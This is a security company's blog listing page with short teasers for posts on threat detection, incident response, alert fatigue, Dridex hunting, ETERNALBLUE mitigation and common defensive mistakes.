Improving Threat Detection

Improve Your Threat Detection: Inspect All of the New Everythings

Keith McCammon, Chief Security Officer

When asked to describe the potential threats that Red Canary detects and confirms, we tend to frame the discussion around several big buckets: Bad things – the most obvious: malware and unwanted software, primarily. Good things gone bad – legitimate applications and services leveraged by a malicious actor . . . think PowerShell, WMIC, MSHTA, etc. Unusual things – why does your CEO … Read More

Threat Investigation 5207

Shutting Down a Hands-on Keyboard Attack: Two Joes vs One Threat Actor

Suzanne Moore

It was a Friday afternoon when the alert came in. One of Red Canary’s customers had experienced a breach. The compromise occurred on an unsecured endpoint—an isolation development box that was used for testing. The customer had deployed Red Canary Managed Endpoint Detection & Response (MEDR) across its most critical endpoints: domain controllers, front-facing web server, executive endpoints, databases, and … Read More

Alert Fatigue

Alert Fatigue: How to Tune Out the Noise and Reclaim Your Hours

Keshia LeVan

As an analyst, reviewing events generally takes up a pretty good chunk of your day. And as much as there is a lot of hype about moving away from “signature-based detection,” many detection solutions are at their core just based on a rule (or set of rules) with some Boolean logic and pattern matching. That’s not to say they aren’t … Read More

Threat Hunting for Dridex

Threat Hunting for Dridex Attacks: Top Questions from Security Teams

Joe Moles

I recently spoke on a threat hunting webinar with our partner Carbon Black in which we dove into Dridex attacks: how they work, why they’re so effective, and how security teams can detect them through a proactive threat hunting approach. For anyone who’s unfamiliar with Dridex, the malware evades signature-based detection and is built to harvest the banking credentials of … Read More

Using Cb Response to Mitigate ETERNALBLUE

Keith McCammon, Chief Security Officer

In case you’ve been under a rock: There’s a wee problem with ransomware, fueled by the public release of a handful of high quality access (exploit) and persistence (backdoor) utilities. Most recently, these have manifested in the form of the WannaCry and Petya epidemics. While good intelligence on Petya infection vectors and lateral movement techniques are in a state of … Read More

investment firm information security

An Investment Firm’s Information Security Strategy: Layering Multiple Partners for a Robust Line of Defense

Suzanne Moore

Cybercriminals attacked the financial services sector more than any other industry last year. A recent research report found that 75% of the top 20 U.S. commercial banks (by revenue) are infected with malware. And another analysis on cyber risk management found that 69% of incidents went undetected by financial security teams for weeks to months. So what is the best line of … Read More

Lack of visibility

Common Security Mistake #1: Lack of Visibility

Phil Hagen

Even mature security teams sometimes make mistakes. This series of blog posts will address common mistakes based on real-world engagements with teams of all sizes and maturity levels. The author, Phil Hagen, is a long-time information security strategist, digital forensics practitioner, and SANS Certified Instructor. Part of Phil’s role at Red Canary is to educate organizations about ways to solve problems … Read More